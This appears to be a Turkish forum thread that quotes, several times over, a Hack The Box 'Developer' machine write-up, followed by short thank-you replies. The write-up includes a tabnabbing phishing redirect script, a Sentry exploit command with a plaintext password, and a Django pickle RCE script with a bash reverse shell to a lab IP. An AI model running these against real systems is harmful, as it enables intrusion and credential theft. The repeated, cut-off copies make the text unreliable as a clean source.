İki aşamalı çalışır. Birincisi düzenli bir hızlı tarama gerçekleştirir, ikincisi ise mevcut komut dosyalarını (seçenek - A ) kullanarak daha kapsamlı bir tarama gerçekleştirir.

80 - webden sorumlu
22 - SSH'yi çalıştırıyor
Yardım: kaba kuvvet hesapları

Henüz her zaman yetkilendirme gerektiren (SSH gibi) kimlik bilgilerine sahip olmadığımız için hizmetler hakkında bilgi edinmenin bir anlamı yok. Yapılabilecek tek şey şifreleri kaba kuvvetle kullanmaktır, ancak Hack The Box'a sahip makinelerin neredeyse her zaman farklı bir senaryosu vardır. Gerçekte bu tür seçenekler olmayabilir; üstelik şifreyi tahmin etme veya sosyal mühendislik kullanarak alma şansı da vardır .

Elbette web ile başlıyoruz!

Bir CTF (Capture The Flag) sitesinin web sitesi bizi karşılıyor. Kayıt ve yetkilendirme olasılığını görüyoruz, ancak ilginç bir şekilde PHP'de tek bir dosya yok. Belki bir Python çerçevesidir? Sitenin kök dizinindeki gizli dizinleri tarayarak tahminimizi kontrol edelim.

ffuf ile web taraması

Bir web uygulamasının güvenliğini test ederken ilk adım, dizin kaba kuvvet taramasıdır. Bu amaçla DIRB ve dirsearch gibi programları kullanabilirsiniz .

Hafif ve çok hızlı ffuf'u seviyorum . Başlatma seçenekleri:

-w - sözlük (kişisel olarak SecLists'teki sözlükleri tercih ederim );
-fc - 403 kodlu yanıtları sonuçtan hariç tutun;
-u - URL;
-t — iş parçacığı sayısı.
Komut şu şekilde çıkıyor:

ffuf -u http://developer.htb/FUZZ -t 256 -w directory_2.3_medium_lowercase.txt

Çıktı, 301 - yönlendirme kodlu birçok dizin içerecektir. Üzerlerine tıkladığımızda bizi Django framework’ünün admin paneli karşılıyor.

Başka bir şey bulamayınca ilk siteye kayıt oluyoruz.

Web sitesi farklı kategorilerden iki veya üç görev içeriyor ancak kullanıcı profili ayarlarının olduğu sayfa ilgimi çekti.

Metin alanlarının taranması herhangi bir sonuç üretmez. Görevlerden herhangi birini geçmeye çalışalım. Adli tıp ödevi phished_credentials'a bakmaya karar verdim . Görev şartlarına göre dosyanın bir yerinde bir şifre var.

Giriş noktası
Dosyayı açtıktan sonra gizli E sütununu görüyoruz. Belge şifreyle değiştirilmeye karşı korunduğu için sütunları genişletmek mümkün değil
dir.

Bu tür korumayı atlamak basittir. Arşiv olarak açın ve içinde istediğiniz sayfanın ayarlarını bulun. Bizim durumumuzda yalnızca bir tane olduğundan,

sayfa1 dosyasına ihtiyacımız var . xml

Bu dosyada şu satırı bulup siliyoruz ( sheetProtection field ):

<sheetProtection algorithmName="SHA-512" hashValue="Y4Ko7kZUKStIxaVGWEtuMeRdnCiN7O3D8qZtKdo/2jP7WE6yzKQXUcSWQ/E0OrqHCzhOBFX+t8Db5Pxaiu+N1g==" saltValue="EoiHQklf0FagPs+iW0OzkA==" spinCount="100000" sheet="1" objects="1" scenarios="1"/>

Sayfa Koruma alanı

Dosyayı kaydedin ve belgeyi açın. Şimdi koruma yok. E sütununu genişletiyoruz ve sitenin bayrağını buluyoruz.

Geriye kalan tek şey web sitesindeki forma girmek.

Artık sayfayı güncelledikten sonra görünüm biraz değişti; yanıt gönderme düğmesi yerine çözüm gönderme düğmesi ortaya çıktı.

Ve bir dosya indirerek değil, sayfa URL'sini belirterek.

Yerel Python 3 web sunucusunu açın (

python3  - m http .server 80 komutu

) ve bağlantıyı gönderin:

http://10.10.14.59/writeup.html

Web sunucusu günlüklerinde belirtilen sayfaya bir istek buluyoruz. Burası test edilecek yer!

Ayrıca çözüm profil sayfasında görüntülenir.
Ancak görüntülemeye çalışırsanız yeni bir sekmede açılacaktır. Sayfanın kaynak kodunda,

<a> etiketinde target = "_blank" niteliğini buluyoruz

target = "_blank" özelliğine sahip <a> etiketinin href argümanı kontrolümüz

altında olduğunda ve hedef kullanıcı bağlantıyı takip edebildiğinde, orada bir phishing sitesi belirtme şansı vardır .

Kullanıcı, window

nesnesini kullanarak bağlantıyı tıkladığında . açıcıyı, yasal yetkilendirme sayfasının bir kopyasını içerecek olan kötü amaçlı kaynağımıza yönlendiririz. Bu, kullanıcıyı kimlik bilgilerini girmeye zorlamalıdır. Bu kimlik avı tekniğine Sekme Nabbing adı veriliyor.

Web sunucusu dizininde bir yazma dosyası oluşturalım . Aşağıdaki içeriğe sahip html .

<html>
<script>
if (window.opener) window.opener.parent.location.replace('http://10.10.14.59/login.html');
if (window.parent != window) window.parent.location.replace('http://10.10.14.59/login.html');
</script>
</html>

Bu kod giriş sayfasını açmalıdır . html sunucumuzda. Şimdi sitedeki giriş sayfasını kopyalıyoruz. Bunu yapmak için, Firefox tarayıcısı için sayfanın tamamını tek bir

HTML

dosyasına kaydetmenize olanak tanıyan SingleFile uzantısını kullanıyorum.

Dosyayı giriş olarak kaydedelim .

html'yi açın ve kodunu biraz değiştirin. action = "auth.php"  ve method = "get"

niteliklerini belirtin .

Şimdi görev çözümünü tekrar gönderelim ve web sunucusu günlüklerinde onun isteğini göreceğiz, ardından oturum açmaya yönlendireceğiz . html ve kimlik bilgilerini auth'a gönderme .

php.ini

Bu kimlik bilgileri Django yönetici alanında oturum açmanıza olanak tanır

Dayanak noktası
Tüm yararlı bilgileri elde etmek için bölümleri gözden geçirelim. Burada kullanıcıların ve sitelerin bir listesini alabiliriz.

Yeni bir alan adı aldığımız için onu hemen /

etc / hosts dizinine

ekleyeceğiz . Artık girdimiz şöyle görünecek:

10.10.11.103    developer.htb developer-sentry.developer.htb

Ve Sentry web sitesinde bir yetkilendirme formuyla karşılaşacağız

Bir hizmet için yönetici şifremiz var; bu şifrenin burada da işe yarama ihtimali yüksek. Tek soru kullanıcı adıdır. Yönetici girişinin hatalı olduğu ortaya çıktı; admin @ geliştirici e-postasının tamamını girerseniz . htb veya admin @ geliştirici . ctf , ayrıca hiçbir şey alamıyoruz. Ama yöneticinin adı James. James @ geliştirici e-postasını deneyelim . htb ve siteye erişim sağlayın.

Aşağıda Sentry sürüm numarasını görüyoruz - 8.0.0. Bu en yenisi değil, bu yüzden açıkları aramaya değer . Böylece Google bizi Exploit-DB'ye, daha doğrusu 8.2.0 sürümünün istismarına yönlendiriyor .

İstismar işe yarıyor ama hiçbir şey vermiyor.

python3 50318.py --url 'http://developer-sentry.developer.htb' -U '[email protected]' -P 'SuperSecurePassword@HTB2021' -l 10.10.14.59 -p 4321

Bu yüzden manuel olarak deneriz.

Sentry, Python verilerini serileştirmek ve seri durumdan çıkarmak için gerekli olan turşu modülünü kullanır. Bu, kodun çalıştırılmasına yardımcı olabilir, ancak önce Django gizli anahtarına ihtiyacımız var.

Bir proje oluşturup silerek elde edilebilir: Proje Oluştur → Proje Ekle → Projeyi Kaydet → Proje Ayarı → Projeyi Kaldır.
Gizli anahtar göz önüne alındığında, ihtiyacımız olan kodu çalıştıracak bir nesneyi oluşturmak ve serileştirmek için aşağıdaki PoC'yi kullanabiliriz. İçinde değiştirmeniz gereken tek şey SECRET_KEY ve çerez değerleridir . Yük olarak ters kabuk kullanıyoruz:

/bin/bash -c "bash -i >& /dev/tcp/10.10.14.59/4321 0>&1"

[IMG]https://resmim.net/cdn/2024/09/15/m8QWjW.png[/IMG]

#!/usr/bin/python
import django.core.signing, django.contrib.sessions.serializers
from django.http import HttpResponse
import cPickle
import os
SECRET_KEY='c7f3a64aa184b7cbb1a7cbe9cd544913'
cookie='.eJxrYKotZNQI5UxMLsksS80vSi9kimBjYGAoTs0rKaosZA5lKS5NyY_gAQoZRBnmmGUlBbq7FhVFcAEFSlKLS5Lz87MzU8FayvOLslNTQoXiE0tLMuJLi1OL4pMSk7NT81JClSDG6ZWWZOYU64Hk9VxzEzNzHIEsJ6gaXiR9mSnerKV6AOVwM6Y:1n8lto:4YBeYgMOt1ujubTsANFkmRr3fw4'
newContent =  django.core.signing.loads(cookie,key=SECRET_KEY,serializer=django.contrib.sessions.serializers.PickleSerializer,salt='django.contrib.sessions.backends.signed_cookies')
class PickleRce(object):
   def __reduce__(self):
       return (os.system,('/bin/bash -c "bash -i >& /dev/tcp/10.10.14.59/4321 0>&1"',))
newContent['testcookie'] = PickleRce()
print django.core.signing.dumps(

Kapanış
Dostlar Ayrıcalık yüksekltme sonraki konu olsun çok yoruldum Kusura bakmayın

eline sağlık

 

[legandrary]

eline sağlık

Teşekkürler

 

[Kartalrock]

eline sağlık

 

[egemizah]

Bugün Hack The Box'ın gelişmiş Developer makinesini kullanarak size Django kullanarak bir web sitesini nasıl hackleyeceğinizi göstereceğim. Ayrıca, bir XLS dosyasından şifreyi nasıl çıkaracağınızı ve Sekme Nabbing kimlik avı saldırısını nasıl kullanacağınızı öğreneceğiz.

Django kullanarak bir web sitesini hacklemek

Öncelikle / etc / hosts

dizinine makinenin IP adresini ekleyelim :

10.10.11.103    developer.htb

Bağlantı noktası taramasıyla başlayalım. Bu, herhangi bir sızma testi için standart bir işlemdir. Bağlantı noktası taraması, makinedeki hangi hizmetlerin bağlantıyı kabul ettiğini belirleyecektir.

En popüler tarayıcı Nmap'tir. Aşağıdaki komut dosyası tarama sonuçlarını iyileştirecektir:

#!/bin/bash
ports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -A $1

İki aşamalı çalışır. Birincisi düzenli bir hızlı tarama gerçekleştirir, ikincisi ise mevcut komut dosyalarını (seçenek - A ) kullanarak daha kapsamlı bir tarama gerçekleştirir.

80 - webden sorumlu
22 - SSH'yi çalıştırıyor
Yardım: kaba kuvvet hesapları

Henüz her zaman yetkilendirme gerektiren (SSH gibi) kimlik bilgilerine sahip olmadığımız için hizmetler hakkında bilgi edinmenin bir anlamı yok. Yapılabilecek tek şey şifreleri kaba kuvvetle kullanmaktır, ancak Hack The Box'a sahip makinelerin neredeyse her zaman farklı bir senaryosu vardır. Gerçekte bu tür seçenekler olmayabilir; üstelik şifreyi tahmin etme veya sosyal mühendislik kullanarak alma şansı da vardır .

Elbette web ile başlıyoruz!

Bir CTF (Capture The Flag) sitesinin web sitesi bizi karşılıyor. Kayıt ve yetkilendirme olasılığını görüyoruz, ancak ilginç bir şekilde PHP'de tek bir dosya yok. Belki bir Python çerçevesidir? Sitenin kök dizinindeki gizli dizinleri tarayarak tahminimizi kontrol edelim.

ffuf ile web taraması

Bir web uygulamasının güvenliğini test ederken ilk adım, dizin kaba kuvvet taramasıdır. Bu amaçla DIRB ve dirsearch gibi programları kullanabilirsiniz .

Hafif ve çok hızlı ffuf'u seviyorum . Başlatma seçenekleri:

-w - sözlük (kişisel olarak SecLists'teki sözlükleri tercih ederim );
-fc - 403 kodlu yanıtları sonuçtan hariç tutun;
-u - URL;
-t — iş parçacığı sayısı.
Komut şu şekilde çıkıyor:

ffuf -u http://developer.htb/FUZZ -t 256 -w directory_2.3_medium_lowercase.txt

Çıktı, 301 - yönlendirme kodlu birçok dizin içerecektir. Üzerlerine tıkladığımızda bizi Django framework’ünün admin paneli karşılıyor.

Başka bir şey bulamayınca ilk siteye kayıt oluyoruz.

Web sitesi farklı kategorilerden iki veya üç görev içeriyor ancak kullanıcı profili ayarlarının olduğu sayfa ilgimi çekti.

Metin alanlarının taranması herhangi bir sonuç üretmez. Görevlerden herhangi birini geçmeye çalışalım. Adli tıp ödevi phished_credentials'a bakmaya karar verdim . Görev şartlarına göre dosyanın bir yerinde bir şifre var.

Giriş noktası
Dosyayı açtıktan sonra gizli E sütununu görüyoruz. Belge şifreyle değiştirilmeye karşı korunduğu için sütunları genişletmek mümkün değil
dir.

Bu tür korumayı atlamak basittir. Arşiv olarak açın ve içinde istediğiniz sayfanın ayarlarını bulun. Bizim durumumuzda yalnızca bir tane olduğundan,

sayfa1 dosyasına ihtiyacımız var . xml

Bu dosyada şu satırı bulup siliyoruz ( sheetProtection field ):

<sheetProtection algorithmName="SHA-512" hashValue="Y4Ko7kZUKStIxaVGWEtuMeRdnCiN7O3D8qZtKdo/2jP7WE6yzKQXUcSWQ/E0OrqHCzhOBFX+t8Db5Pxaiu+N1g==" saltValue="EoiHQklf0FagPs+iW0OzkA==" spinCount="100000" sheet="1" objects="1" scenarios="1"/>

Sayfa Koruma alanı

Dosyayı kaydedin ve belgeyi açın. Şimdi koruma yok. E sütununu genişletiyoruz ve sitenin bayrağını buluyoruz.

Geriye kalan tek şey web sitesindeki forma girmek.

Artık sayfayı güncelledikten sonra görünüm biraz değişti; yanıt gönderme düğmesi yerine çözüm gönderme düğmesi ortaya çıktı.

Ve bir dosya indirerek değil, sayfa URL'sini belirterek.

Yerel Python 3 web sunucusunu açın (

python3  - m http .server 80 komutu

) ve bağlantıyı gönderin:

http://10.10.14.59/writeup.html

Web sunucusu günlüklerinde belirtilen sayfaya bir istek buluyoruz. Burası test edilecek yer!

Ayrıca çözüm profil sayfasında görüntülenir.
Ancak görüntülemeye çalışırsanız yeni bir sekmede açılacaktır. Sayfanın kaynak kodunda,

<a> etiketinde target = "_blank" niteliğini buluyoruz

target = "_blank" özelliğine sahip <a> etiketinin href argümanı kontrolümüz

altında olduğunda ve hedef kullanıcı bağlantıyı takip edebildiğinde, orada bir phishing sitesi belirtme şansı vardır .

Kullanıcı, window

nesnesini kullanarak bağlantıyı tıkladığında . açıcıyı, yasal yetkilendirme sayfasının bir kopyasını içerecek olan kötü amaçlı kaynağımıza yönlendiririz. Bu, kullanıcıyı kimlik bilgilerini girmeye zorlamalıdır. Bu kimlik avı tekniğine Sekme Nabbing adı veriliyor.

Web sunucusu dizininde bir yazma dosyası oluşturalım . Aşağıdaki içeriğe sahip html .

<html>
<script>
if (window.opener) window.opener.parent.location.replace('http://10.10.14.59/login.html');
if (window.parent != window) window.parent.location.replace('http://10.10.14.59/login.html');
</script>
</html>

Bu kod giriş sayfasını açmalıdır . html sunucumuzda. Şimdi sitedeki giriş sayfasını kopyalıyoruz. Bunu yapmak için, Firefox tarayıcısı için sayfanın tamamını tek bir

HTML

dosyasına kaydetmenize olanak tanıyan SingleFile uzantısını kullanıyorum.

Dosyayı giriş olarak kaydedelim .

html'yi açın ve kodunu biraz değiştirin. action = "auth.php"  ve method = "get"

niteliklerini belirtin .

Şimdi görev çözümünü tekrar gönderelim ve web sunucusu günlüklerinde onun isteğini göreceğiz, ardından oturum açmaya yönlendireceğiz . html ve kimlik bilgilerini auth'a gönderme .

php.ini

Bu kimlik bilgileri Django yönetici alanında oturum açmanıza olanak tanır

Dayanak noktası
Tüm yararlı bilgileri elde etmek için bölümleri gözden geçirelim. Burada kullanıcıların ve sitelerin bir listesini alabiliriz.

Yeni bir alan adı aldığımız için onu hemen /

etc / hosts dizinine

ekleyeceğiz . Artık girdimiz şöyle görünecek:

10.10.11.103    developer.htb developer-sentry.developer.htb

Ve Sentry web sitesinde bir yetkilendirme formuyla karşılaşacağız

Bir hizmet için yönetici şifremiz var; bu şifrenin burada da işe yarama ihtimali yüksek. Tek soru kullanıcı adıdır. Yönetici girişinin hatalı olduğu ortaya çıktı; admin @ geliştirici e-postasının tamamını girerseniz . htb veya admin @ geliştirici . ctf , ayrıca hiçbir şey alamıyoruz. Ama yöneticinin adı James. James @ geliştirici e-postasını deneyelim . htb ve siteye erişim sağlayın.

Aşağıda Sentry sürüm numarasını görüyoruz - 8.0.0. Bu en yenisi değil, bu yüzden açıkları aramaya değer . Böylece Google bizi Exploit-DB'ye, daha doğrusu 8.2.0 sürümünün istismarına yönlendiriyor .

İstismar işe yarıyor ama hiçbir şey vermiyor.

python3 50318.py --url 'http://developer-sentry.developer.htb' -U '[email protected]' -P 'SuperSecurePassword@HTB2021' -l 10.10.14.59 -p 4321

Bu yüzden manuel olarak deneriz.

Sentry, Python verilerini serileştirmek ve seri durumdan çıkarmak için gerekli olan turşu modülünü kullanır. Bu, kodun çalıştırılmasına yardımcı olabilir, ancak önce Django gizli anahtarına ihtiyacımız var.

Bir proje oluşturup silerek elde edilebilir: Proje Oluştur → Proje Ekle → Projeyi Kaydet → Proje Ayarı → Projeyi Kaldır.
Gizli anahtar göz önüne alındığında, ihtiyacımız olan kodu çalıştıracak bir nesneyi oluşturmak ve serileştirmek için aşağıdaki PoC'yi kullanabiliriz. İçinde değiştirmeniz gereken tek şey SECRET_KEY ve çerez değerleridir . Yük olarak ters kabuk kullanıyoruz:

/bin/bash -c "bash -i >& /dev/tcp/10.10.14.59/4321 0>&1"

[IMG]https://resmim.net/cdn/2024/09/15/m8QWjW.png[/IMG]

#!/usr/bin/python
import django.core.signing, django.contrib.sessions.serializers
from django.http import HttpResponse
import cPickle
import os
SECRET_KEY='c7f3a64aa184b7cbb1a7cbe9cd544913'
cookie='.eJxrYKotZNQI5UxMLsksS80vSi9kimBjYGAoTs0rKaosZA5lKS5NyY_gAQoZRBnmmGUlBbq7FhVFcAEFSlKLS5Lz87MzU8FayvOLslNTQoXiE0tLMuJLi1OL4pMSk7NT81JClSDG6ZWWZOYU64Hk9VxzEzNzHIEsJ6gaXiR9mSnerKV6AOVwM6Y:1n8lto:4YBeYgMOt1ujubTsANFkmRr3fw4'
newContent =  django.core.signing.loads(cookie,key=SECRET_KEY,serializer=django.contrib.sessions.serializers.PickleSerializer,salt='django.contrib.sessions.backends.signed_cookies')
class PickleRce(object):
   def __reduce__(self):
       return (os.system,('/bin/bash -c "bash -i >& /dev/tcp/10.10.14.59/4321 0>&1"',))
newContent['testcookie'] = PickleRce()
print django.core.signing.dumps(

Kapanış
Dostlar Ayrıcalık yüksekltme sonraki konu olsun çok yoruldum Kusura bakmayın

Elinize emeginize saglık

 

['TE0MAN]

Bugün Hack The Box'ın gelişmiş Developer makinesini kullanarak size Django kullanarak bir web sitesini nasıl hackleyeceğinizi göstereceğim. Ayrıca, bir XLS dosyasından şifreyi nasıl çıkaracağınızı ve Sekme Nabbing kimlik avı saldırısını nasıl kullanacağınızı öğreneceğiz.

Django kullanarak bir web sitesini hacklemek

Öncelikle / etc / hosts

dizinine makinenin IP adresini ekleyelim :

10.10.11.103    developer.htb

Bağlantı noktası taramasıyla başlayalım. Bu, herhangi bir sızma testi için standart bir işlemdir. Bağlantı noktası taraması, makinedeki hangi hizmetlerin bağlantıyı kabul ettiğini belirleyecektir.

En popüler tarayıcı Nmap'tir. Aşağıdaki komut dosyası tarama sonuçlarını iyileştirecektir:

#!/bin/bash
ports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -A $1

İki aşamalı çalışır. Birincisi düzenli bir hızlı tarama gerçekleştirir, ikincisi ise mevcut komut dosyalarını (seçenek - A ) kullanarak daha kapsamlı bir tarama gerçekleştirir.

80 - webden sorumlu
22 - SSH'yi çalıştırıyor
Yardım: kaba kuvvet hesapları

Henüz her zaman yetkilendirme gerektiren (SSH gibi) kimlik bilgilerine sahip olmadığımız için hizmetler hakkında bilgi edinmenin bir anlamı yok. Yapılabilecek tek şey şifreleri kaba kuvvetle kullanmaktır, ancak Hack The Box'a sahip makinelerin neredeyse her zaman farklı bir senaryosu vardır. Gerçekte bu tür seçenekler olmayabilir; üstelik şifreyi tahmin etme veya sosyal mühendislik kullanarak alma şansı da vardır .

Elbette web ile başlıyoruz!

Bir CTF (Capture The Flag) sitesinin web sitesi bizi karşılıyor. Kayıt ve yetkilendirme olasılığını görüyoruz, ancak ilginç bir şekilde PHP'de tek bir dosya yok. Belki bir Python çerçevesidir? Sitenin kök dizinindeki gizli dizinleri tarayarak tahminimizi kontrol edelim.

ffuf ile web taraması

Bir web uygulamasının güvenliğini test ederken ilk adım, dizin kaba kuvvet taramasıdır. Bu amaçla DIRB ve dirsearch gibi programları kullanabilirsiniz .

Hafif ve çok hızlı ffuf'u seviyorum . Başlatma seçenekleri:

-w - sözlük (kişisel olarak SecLists'teki sözlükleri tercih ederim );
-fc - 403 kodlu yanıtları sonuçtan hariç tutun;
-u - URL;
-t — iş parçacığı sayısı.
Komut şu şekilde çıkıyor:

ffuf -u http://developer.htb/FUZZ -t 256 -w directory_2.3_medium_lowercase.txt

Çıktı, 301 - yönlendirme kodlu birçok dizin içerecektir. Üzerlerine tıkladığımızda bizi Django framework’ünün admin paneli karşılıyor.

Başka bir şey bulamayınca ilk siteye kayıt oluyoruz.

Web sitesi farklı kategorilerden iki veya üç görev içeriyor ancak kullanıcı profili ayarlarının olduğu sayfa ilgimi çekti.

Metin alanlarının taranması herhangi bir sonuç üretmez. Görevlerden herhangi birini geçmeye çalışalım. Adli tıp ödevi phished_credentials'a bakmaya karar verdim . Görev şartlarına göre dosyanın bir yerinde bir şifre var.

Giriş noktası
Dosyayı açtıktan sonra gizli E sütununu görüyoruz. Belge şifreyle değiştirilmeye karşı korunduğu için sütunları genişletmek mümkün değil
dir.

Bu tür korumayı atlamak basittir. Arşiv olarak açın ve içinde istediğiniz sayfanın ayarlarını bulun. Bizim durumumuzda yalnızca bir tane olduğundan,

sayfa1 dosyasına ihtiyacımız var . xml

Bu dosyada şu satırı bulup siliyoruz ( sheetProtection field ):

<sheetProtection algorithmName="SHA-512" hashValue="Y4Ko7kZUKStIxaVGWEtuMeRdnCiN7O3D8qZtKdo/2jP7WE6yzKQXUcSWQ/E0OrqHCzhOBFX+t8Db5Pxaiu+N1g==" saltValue="EoiHQklf0FagPs+iW0OzkA==" spinCount="100000" sheet="1" objects="1" scenarios="1"/>

Sayfa Koruma alanı

Dosyayı kaydedin ve belgeyi açın. Şimdi koruma yok. E sütununu genişletiyoruz ve sitenin bayrağını buluyoruz.

Geriye kalan tek şey web sitesindeki forma girmek.

Artık sayfayı güncelledikten sonra görünüm biraz değişti; yanıt gönderme düğmesi yerine çözüm gönderme düğmesi ortaya çıktı.

Ve bir dosya indirerek değil, sayfa URL'sini belirterek.

Yerel Python 3 web sunucusunu açın (

python3  - m http .server 80 komutu

) ve bağlantıyı gönderin:

http://10.10.14.59/writeup.html

Web sunucusu günlüklerinde belirtilen sayfaya bir istek buluyoruz. Burası test edilecek yer!

Ayrıca çözüm profil sayfasında görüntülenir.
Ancak görüntülemeye çalışırsanız yeni bir sekmede açılacaktır. Sayfanın kaynak kodunda,

<a> etiketinde target = "_blank" niteliğini buluyoruz

target = "_blank" özelliğine sahip <a> etiketinin href argümanı kontrolümüz

altında olduğunda ve hedef kullanıcı bağlantıyı takip edebildiğinde, orada bir phishing sitesi belirtme şansı vardır .

Kullanıcı, window

nesnesini kullanarak bağlantıyı tıkladığında . açıcıyı, yasal yetkilendirme sayfasının bir kopyasını içerecek olan kötü amaçlı kaynağımıza yönlendiririz. Bu, kullanıcıyı kimlik bilgilerini girmeye zorlamalıdır. Bu kimlik avı tekniğine Sekme Nabbing adı veriliyor.

Web sunucusu dizininde bir yazma dosyası oluşturalım . Aşağıdaki içeriğe sahip html .

<html>
<script>
if (window.opener) window.opener.parent.location.replace('http://10.10.14.59/login.html');
if (window.parent != window) window.parent.location.replace('http://10.10.14.59/login.html');
</script>
</html>

Bu kod giriş sayfasını açmalıdır . html sunucumuzda. Şimdi sitedeki giriş sayfasını kopyalıyoruz. Bunu yapmak için, Firefox tarayıcısı için sayfanın tamamını tek bir

HTML

dosyasına kaydetmenize olanak tanıyan SingleFile uzantısını kullanıyorum.

Dosyayı giriş olarak kaydedelim .

html'yi açın ve kodunu biraz değiştirin. action = "auth.php"  ve method = "get"

niteliklerini belirtin .

Şimdi görev çözümünü tekrar gönderelim ve web sunucusu günlüklerinde onun isteğini göreceğiz, ardından oturum açmaya yönlendireceğiz . html ve kimlik bilgilerini auth'a gönderme .

php.ini

Bu kimlik bilgileri Django yönetici alanında oturum açmanıza olanak tanır

Dayanak noktası
Tüm yararlı bilgileri elde etmek için bölümleri gözden geçirelim. Burada kullanıcıların ve sitelerin bir listesini alabiliriz.

Yeni bir alan adı aldığımız için onu hemen /

etc / hosts dizinine

ekleyeceğiz . Artık girdimiz şöyle görünecek:

10.10.11.103    developer.htb developer-sentry.developer.htb

Ve Sentry web sitesinde bir yetkilendirme formuyla karşılaşacağız

Bir hizmet için yönetici şifremiz var; bu şifrenin burada da işe yarama ihtimali yüksek. Tek soru kullanıcı adıdır. Yönetici girişinin hatalı olduğu ortaya çıktı; admin @ geliştirici e-postasının tamamını girerseniz . htb veya admin @ geliştirici . ctf , ayrıca hiçbir şey alamıyoruz. Ama yöneticinin adı James. James @ geliştirici e-postasını deneyelim . htb ve siteye erişim sağlayın.

Aşağıda Sentry sürüm numarasını görüyoruz - 8.0.0. Bu en yenisi değil, bu yüzden açıkları aramaya değer . Böylece Google bizi Exploit-DB'ye, daha doğrusu 8.2.0 sürümünün istismarına yönlendiriyor .

İstismar işe yarıyor ama hiçbir şey vermiyor.

python3 50318.py --url 'http://developer-sentry.developer.htb' -U '[email protected]' -P 'SuperSecurePassword@HTB2021' -l 10.10.14.59 -p 4321

Bu yüzden manuel olarak deneriz.

Sentry, Python verilerini serileştirmek ve seri durumdan çıkarmak için gerekli olan turşu modülünü kullanır. Bu, kodun çalıştırılmasına yardımcı olabilir, ancak önce Django gizli anahtarına ihtiyacımız var.

Bir proje oluşturup silerek elde edilebilir: Proje Oluştur → Proje Ekle → Projeyi Kaydet → Proje Ayarı → Projeyi Kaldır.
Gizli anahtar göz önüne alındığında, ihtiyacımız olan kodu çalıştıracak bir nesneyi oluşturmak ve serileştirmek için aşağıdaki PoC'yi kullanabiliriz. İçinde değiştirmeniz gereken tek şey SECRET_KEY ve çerez değerleridir . Yük olarak ters kabuk kullanıyoruz:

/bin/bash -c "bash -i >& /dev/tcp/10.10.14.59/4321 0>&1"

[IMG]https://resmim.net/cdn/2024/09/15/m8QWjW.png[/IMG]

#!/usr/bin/python
import django.core.signing, django.contrib.sessions.serializers
from django.http import HttpResponse
import cPickle
import os
SECRET_KEY='c7f3a64aa184b7cbb1a7cbe9cd544913'
cookie='.eJxrYKotZNQI5UxMLsksS80vSi9kimBjYGAoTs0rKaosZA5lKS5NyY_gAQoZRBnmmGUlBbq7FhVFcAEFSlKLS5Lz87MzU8FayvOLslNTQoXiE0tLMuJLi1OL4pMSk7NT81JClSDG6ZWWZOYU64Hk9VxzEzNzHIEsJ6gaXiR9mSnerKV6AOVwM6Y:1n8lto:4YBeYgMOt1ujubTsANFkmRr3fw4'
newContent =  django.core.signing.loads(cookie,key=SECRET_KEY,serializer=django.contrib.sessions.serializers.PickleSerializer,salt='django.contrib.sessions.backends.signed_cookies')
class PickleRce(object):
   def __reduce__(self):
       return (os.system,('/bin/bash -c "bash -i >& /dev/tcp/10.10.14.59/4321 0>&1"',))
newContent['testcookie'] = PickleRce()
print django.core.signing.dumps(

Kapanış
Dostlar Ayrıcalık yüksekltme sonraki konu olsun çok yoruldum Kusura bakmayın

Eline emeğine sağlık ayracı çaldım helal et asfdhdhafafsfsg

 

[spyizxa1]

Bugün Hack The Box'ın gelişmiş Developer makinesini kullanarak size Django kullanarak bir web sitesini nasıl hackleyeceğinizi göstereceğim. Ayrıca, bir XLS dosyasından şifreyi nasıl çıkaracağınızı ve Sekme Nabbing kimlik avı saldırısını nasıl kullanacağınızı öğreneceğiz.

Django kullanarak bir web sitesini hacklemek

Öncelikle / etc / hosts

dizinine makinenin IP adresini ekleyelim :

10.10.11.103    developer.htb

Bağlantı noktası taramasıyla başlayalım. Bu, herhangi bir sızma testi için standart bir işlemdir. Bağlantı noktası taraması, makinedeki hangi hizmetlerin bağlantıyı kabul ettiğini belirleyecektir.

En popüler tarayıcı Nmap'tir. Aşağıdaki komut dosyası tarama sonuçlarını iyileştirecektir:

#!/bin/bash
ports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -A $1

İki aşamalı çalışır. Birincisi düzenli bir hızlı tarama gerçekleştirir, ikincisi ise mevcut komut dosyalarını (seçenek - A ) kullanarak daha kapsamlı bir tarama gerçekleştirir.

80 - webden sorumlu
22 - SSH'yi çalıştırıyor
Yardım: kaba kuvvet hesapları

Henüz her zaman yetkilendirme gerektiren (SSH gibi) kimlik bilgilerine sahip olmadığımız için hizmetler hakkında bilgi edinmenin bir anlamı yok. Yapılabilecek tek şey şifreleri kaba kuvvetle kullanmaktır, ancak Hack The Box'a sahip makinelerin neredeyse her zaman farklı bir senaryosu vardır. Gerçekte bu tür seçenekler olmayabilir; üstelik şifreyi tahmin etme veya sosyal mühendislik kullanarak alma şansı da vardır .

Elbette web ile başlıyoruz!

Bir CTF (Capture The Flag) sitesinin web sitesi bizi karşılıyor. Kayıt ve yetkilendirme olasılığını görüyoruz, ancak ilginç bir şekilde PHP'de tek bir dosya yok. Belki bir Python çerçevesidir? Sitenin kök dizinindeki gizli dizinleri tarayarak tahminimizi kontrol edelim.

ffuf ile web taraması

Bir web uygulamasının güvenliğini test ederken ilk adım, dizin kaba kuvvet taramasıdır. Bu amaçla DIRB ve dirsearch gibi programları kullanabilirsiniz .

Hafif ve çok hızlı ffuf'u seviyorum . Başlatma seçenekleri:

-w - sözlük (kişisel olarak SecLists'teki sözlükleri tercih ederim );
-fc - 403 kodlu yanıtları sonuçtan hariç tutun;
-u - URL;
-t — iş parçacığı sayısı.
Komut şu şekilde çıkıyor:

ffuf -u http://developer.htb/FUZZ -t 256 -w directory_2.3_medium_lowercase.txt

Çıktı, 301 - yönlendirme kodlu birçok dizin içerecektir. Üzerlerine tıkladığımızda bizi Django framework’ünün admin paneli karşılıyor.

Başka bir şey bulamayınca ilk siteye kayıt oluyoruz.

Web sitesi farklı kategorilerden iki veya üç görev içeriyor ancak kullanıcı profili ayarlarının olduğu sayfa ilgimi çekti.

Metin alanlarının taranması herhangi bir sonuç üretmez. Görevlerden herhangi birini geçmeye çalışalım. Adli tıp ödevi phished_credentials'a bakmaya karar verdim . Görev şartlarına göre dosyanın bir yerinde bir şifre var.

